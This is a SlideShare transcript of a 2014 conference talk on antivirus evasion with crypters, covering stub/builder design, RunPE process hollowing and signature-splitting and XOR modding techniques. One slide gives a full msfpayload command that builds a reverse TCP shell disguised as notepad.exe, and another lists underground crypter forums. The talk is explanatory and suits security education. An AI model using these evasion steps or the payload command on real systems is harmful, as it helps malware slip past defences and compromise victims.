Your SlideShare is downloading. ×
AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay

1,330
views

Published on

AntiVirus Evasion Techniques …

AntiVirus Evasion Techniques
Use of Crypters
Presentation 2k14 at MundoHackerDay Congress
Kevin Mitnick was also there ;)

Published in: Technology

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,330
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
60
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. AntiVirus Evasion: Use of Crypters Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14
  • 2. Whoami ncd:~ apasamar$ whoami apasamar apasamar@incide.es @apasamar a.k.a brajan ncd:~ apasamar$ cat apasamar.cv Electrical Engineer and Master in Information Security Co-founder of INCIDE: Electronic Evidence Experts Forensics / Expert Witness Reports Incident Response IT Security Auditors and Colsultants ! ncd:~ apasamar$ rm apasamar.cv
  • 3. what is this about... • Introduction • AV’s how they work • Malware types and AV detection • Evasion techniques • Auto-encryption, Polymorfism, Ofuscation, Compresion • Crypters • types • stub • stub FUD • Modding techniques • Resources
  • 4. introduction • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • Empresas AV’s —> Detectar MALWARE • Malos: INDETECTAR MALWARE
  • 5. introduction • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • AV Companies —> MALWARE Detection • BAD GUYS: Undetect MALWARE
  • 6. introduction Bad guys objective:
  • 7. introduction Bad guys objective:
  • 8. AV howto • AntiVirus scan binaries on HARD DISC • They do not SCAN MEMORY, only binaries that ‘start’ the running processes • Scan for signatures: binary sequences @ AV DataBase • Look for malicious tecniques (Heuristics):API’s, functions, XOR, etc • Sandbox (partial execution):look for decryption routines, etc
  • 9. AV howto EJECUTABLE DISCO RAM PROCESO ? SCAN ? AV
  • 10. AV howto • AV analysis process: Atacs
  • 11. AV howto • Recomended: “Abusing File Processing in Malware Detectors for Fun and Profit” (2012) Suman Jana and Vitaly Shmatikov The University of Texas at Austin
  • 12. AV howto • Metasploit Framework (Rapid7) • Community Edition: • msfpayload windows/shell/ reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe • Pro Edition: • Generate AV-evading Dynamic Payloads
  • 13. types of malware and AV detection • Comercial SPY Programms: (white list, signed) • e-blaster • 007 • perfect keylogger • …
  • 14. • Malware newly created: • LOW detection (NO known signatures) • possible heuristic detections types of malware and AV detection
  • 15. • Existing Malware: (very well known, signature and heuristic detections) • trojans (BiFrost, PoisonIvy,CyberGate, SpyNet, Darkcomet) • downloaders • passwords stealers • reverse shells types of malware and AV detection
  • 16. How can we make undetectable malware already detected by AV? • C r y p t e r s: • Software allows you to encrypt ANY MALWARE doing it undetectable to AV.
  • 17. crypters
  • 18. builder / stub • Builder: • Is responsible for creating the NEW EXEcutable, composed of the STUB and the ENCRYPTED MALWARE • Stub: • Its mission is to decrypt and run the ENCRYPTED MALWARE
  • 19. ! ! ! ! ! ! ! ! ! CRYPTER + STUB STUB DETECTED MALWARE ENCRYPTED MALWARE STUB CRYPTER (Builder) XOR, RC4, ... exe dll resource builder / stub
  • 20. STUB CRYPTED MALWARE STUB CRYPTED MALWAREKEY splitter splitter A resource section can always be used builder / stub
  • 21. • Crypters types: • ScanTime • RunTime builder / stub
  • 22. • ScanTime STUB CRYPTED MALWARE DETECTED MALWARE HARD DISC AV stub
  • 23. • RunTime STUB ENCRYPTED MALWARE HARD DISC RAM DETECTEDMALWARE AV stub
  • 24. • STUB modules: • Decrypt Routine • RunPe (Dynamic Forking) Routine ! stub
  • 25. RunPE o Dynamic Forking CreateProcess PROCESs 1 (CREATE_SUSPENDED) GetThreadContext PEB EBX EAX BaseAddress 1 EP I +8 PROCESS 2 ReadFile WriteProcessMemoryEP 2 BaseAddress 2 SetThreadContextResumeThread
  • 26. FUD • Target: FUD Stub (Full UnDetectable) • From Source Code • From Binary Code • ¿How? • MODDING
  • 27. modding source code • Manually or using obfuscation tools: • Function replacement (SPLIT,..) • Funciones/strings/variables replacement and ofuscation. Use of rot13 or Hex encoding • Encrytion: RC4 and XOR are very well known by AV • Alternatives:TEA, DES, etc • Alternative RunPE Routines • Fake APIs • TLB (Tab Library File) • Trash code
  • 28. • Techniques: • Dsplit/AvFucker • SignatureFucker • Hexing • RIT • XOR and variants • Tips modding binary file
  • 29. • We have to Undetect STUB, BUILDER is only a tool used at home, not in the wild • First of all is to FIND AV SIGNATURES: • Simple Signatures • Multiple Signatures • Heuristic Signatures modding binary file
  • 30. • Recomended: “Bypassing Anti-Virus Scanners” (2012) InterNOT Security Team modding binary file
  • 31. • ¿What if we use a simple Encrytion/Decrytion rutine inside the STUB? stub.exe EP Signatures stub.exe OLD EP Signatures NEW EP Encrypted Decrytion Rutine modding binary file
  • 32. • ORIGINAL STUB MULTIPLE AV SCAN modding binary file Do NOT use VirusTotal for these Scans or your STUB samples will be send to AV Companies :(
  • 33. • ENCRYPTION ROUTINE • NEW EP • INSERT ROUTINE • .text SECTION • from offset 1050 • to Import Table modding binary file
  • 34. • ENCRYPTION ROUTINE AT NEW EP • used only to encrypt .text section (used once) Set breakpoint here, after encryption routine modding binary file
  • 35. • DECRYPTION AND EXECUTION AN NEW EP modding binary file
  • 36. • MODIFIED STUB MULTIPLE AV SCAN 16 AV’s KO modding binary file
  • 37. modding binary file • Techniques: • Dsplit/AvFucker • SignatureFucker • Hexing • RIT • XOR and variants • Tips
  • 38. • DSplit: Header EXE body Header EXE body 1000 bytes Header EXE body 2000 bytes Header EXE body 3000 bytes Header EXE body ··· Nx1000 bytes modding binary file
  • 39. • AvFucker: EXE bodyHeader 0000000000 1000 bytes Header EXE body0000000000 1000 bytes Header Cuerpo EXE0000000000 1000 bytes Header EXE body ··· 0000000000 1000 bytes modding binary file Header EXE body
  • 40. • RIT Technique • Find out AV Signature • If Signture is located at instructions code —> break flow • jump to another address (hole in section where yo can write your code) • Execute pending instrucionts • Return/jump to the appropriate instrucion modding binary file
  • 41. • XOR Tecnique • Find out AV Signature • Apply to a byte XOR with any value i.e. 22 • Modify EP or jump to your hole • Apply XOR 22 to the modified byte • Return/jump to the appropriate instrucion modding binary file
  • 42. Detected bytes (EP): XOR of the detected bytes: New EP ( XORs and jump to original EP): modding binary file
  • 43. other techniques • Add Fake APIs • Hex strings edit • Move/change function calls • Change funtion call type: by name/by offset • Insert detected dll function into Stub Code !
  • 44. resources • http://www.indetectables.net • http://www.udtools.net • http://www.masters-hackers.info • http://www.level-23.biz/ • http://www.corp-51.net/ • http://www.underc0de.org !
  • 45. Avda. Diagonal, 640 6ª Planta 08017 Barcelona (Spain) info@incide.es http://www.incide.es http://www.twitter.com/1NC1D3 http://www.atrapadosporlosbits.com http://www.youtube.com/incidetube Companies > INCIDE - Investigación Digital Tel./Fax. +34 932 546 277 / +34 932 546 314 A NY Q U E S T I O N S ?

×